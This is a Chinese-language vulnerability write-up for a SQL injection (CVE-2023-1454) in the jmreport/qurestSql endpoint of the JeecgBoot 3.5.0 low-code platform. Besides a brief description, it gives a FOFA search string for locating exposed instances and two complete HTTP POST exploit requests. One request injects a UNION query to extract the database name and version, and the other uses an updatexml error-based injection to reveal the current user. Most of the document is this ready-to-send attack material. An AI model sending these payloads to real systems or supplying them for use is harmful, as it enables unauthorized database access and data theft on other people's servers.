JeecgBoot企业级低代码平台 qurestSql SQL注入(CVE-2023-1454)
一、漏洞简介
JeecgBoot是一款基于BPM的低代码平台,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发。jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题,通过参数 apiSelectId 导致SQL注入。
二、影响版本
- JeecgBoot 3.5.0
三、资产测绘
- fofa
app="JeecgBoot-企业级低代码平台" - 特征
四、漏洞复现
访问如下POC出现以下页面表示存在漏洞
/jeecg-boot/jmreport/qurestSql
exp
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 131
{"apiSelectId": "1290104038414721025", "id": "1' union all select 1,2,database(),version(),5,6,7 from rep_demo_gongsi where id='1"}
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: Hm_lvt_0febd9e3cacb3f627ddac64d52caac39=1695482957; Hm_lpvt_0febd9e3cacb3f627ddac64d52caac39=1695482970
Upgrade-Insecure-Requests: 1
Content-Type: application/json;charset=UTF-8
Content-Length: 128
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}